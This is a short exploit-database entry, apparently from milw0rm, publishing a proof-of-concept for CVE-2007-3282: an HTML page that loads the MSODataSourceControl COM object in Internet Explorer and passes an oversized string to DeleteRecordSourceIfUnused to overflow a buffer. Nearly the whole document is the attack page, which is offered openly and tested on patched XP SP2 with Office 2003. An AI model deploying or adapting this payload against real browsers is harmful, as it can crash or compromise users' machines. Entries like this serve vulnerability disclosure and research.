Microsoft Office - MSODataSourceControl COM-object Buffer Overflow (PoC)

Related Vulnerabilities: CVE-2007-3282  
Publish Date: 13 Jun 2007
Author: YAG KOHHA
                MSODataSourceControl.DeleteRecordSourceIfUnused COM-object B0F POC
Tested on full patched XP/SP2, IE7, MSO2003

<html>
<object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}"></object>
<script language="javascript">
var b = 'AAAA';
while (b.length <= 256) b+=b;
ctl.DeleteRecordSourceIfUnused(b);
</script>
</html>

# milw0rm.com [2007-06-13]